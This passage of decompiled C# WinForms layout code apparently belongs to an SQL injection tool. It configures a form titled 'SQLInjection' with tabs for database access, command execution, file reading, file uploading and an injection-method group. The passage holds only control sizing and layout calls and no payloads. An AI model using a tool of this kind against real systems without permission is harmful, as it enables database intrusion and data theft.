			((ToolStripItem)cmbParameterType).set_Size(new Size(100, 25));
			cmbParameterType.add_DropDownClosed((EventHandler)cmbParameterType_DropDownClosed);
			((ToolStripItem)toolStripSeparator3).set_Name("toolStripSeparator3");
			((ToolStripItem)toolStripSeparator3).set_Size(new Size(6, 25));
			((ToolStripItem)ButtonResetSQL).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)ButtonResetSQL).set_Image((Image)((ResourceManager)(object)val).GetObject("ButtonResetSQL.Image"));
			((ToolStripItem)ButtonResetSQL).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)ButtonResetSQL).set_Name("ButtonResetSQL");
			((ToolStripItem)ButtonResetSQL).set_Size(new Size(44, 22));
			((ToolStripItem)ButtonResetSQL).set_Text("Reset");
			((ToolStripItem)ButtonResetSQL).add_Click((EventHandler)ButtonResetSQL_Click);
			((ToolStripItem)toolStripSeparator20).set_Name("toolStripSeparator20");
			((ToolStripItem)toolStripSeparator20).set_Size(new Size(6, 25));
			((ContainerControl)this).set_AutoScaleDimensions(new SizeF(6f, 12f));
			((ContainerControl)this).set_AutoScaleMode((AutoScaleMode)1);
			((Form)this).set_ClientSize(new Size(685, 470));
			((Control)this).get_Controls().Add((Control)(object)tabSQLInjection);
			((Control)this).get_Controls().Add((Control)(object)toolStripSQL);
			((Form)this).set_FormBorderStyle((FormBorderStyle)0);
			((Control)this).set_Name("FormSQL");
			((Control)this).set_Text("SQLInjection");
			((Control)tabSQLInjection).ResumeLayout(false);
			((Control)tabEnv).ResumeLayout(false);
			((Control)tabEnv).PerformLayout();
			((Control)toolStripEnv).ResumeLayout(false);
			((Control)toolStripEnv).PerformLayout();
			((Control)tabDatabase).ResumeLayout(false);
			((Control)splitDB.get_Panel1()).ResumeLayout(false);
			((Control)splitDB.get_Panel1()).PerformLayout();
			((Control)splitDB.get_Panel2()).ResumeLayout(false);
			((Control)splitDB.get_Panel2()).PerformLayout();
			((Control)splitDB).ResumeLayout(false);
			((Control)toolStripDB).ResumeLayout(false);
			((Control)toolStripDB).PerformLayout();
			((Control)toolStripData).ResumeLayout(false);
			((Control)toolStripData).PerformLayout();
			((Control)tabCMD).ResumeLayout(false);
			((Control)tabCMD).PerformLayout();
			((Control)toolStripDBCMD).ResumeLayout(false);
			((Control)toolStripDBCMD).PerformLayout();
			((Control)toolStripCommand).ResumeLayout(false);
			((Control)toolStripCommand).PerformLayout();
			((Control)tabFileReader).ResumeLayout(false);
			((Control)tabFileReader).PerformLayout();
			((Control)toolFileReader).ResumeLayout(false);
			((Control)toolFileReader).PerformLayout();
			((Control)tabFileUploader).ResumeLayout(false);
			((Control)tabFileUploader).PerformLayout();
			((Control)tabEscapeString).ResumeLayout(false);
			((Control)tabEscapeString).PerformLayout();
			((Control)tabDebug).ResumeLayout(false);
			((Control)grpInjectMethod).ResumeLayout(false);
			((Control)grpInjectMethod).PerformLayout();
			((Control)toolStripSQL).ResumeLayout(false);
			((Control)toolStripSQL).PerformLayout();
			((Control)this).ResumeLayout(false);
			((Control)this).PerformLayout();
		}
	}
}
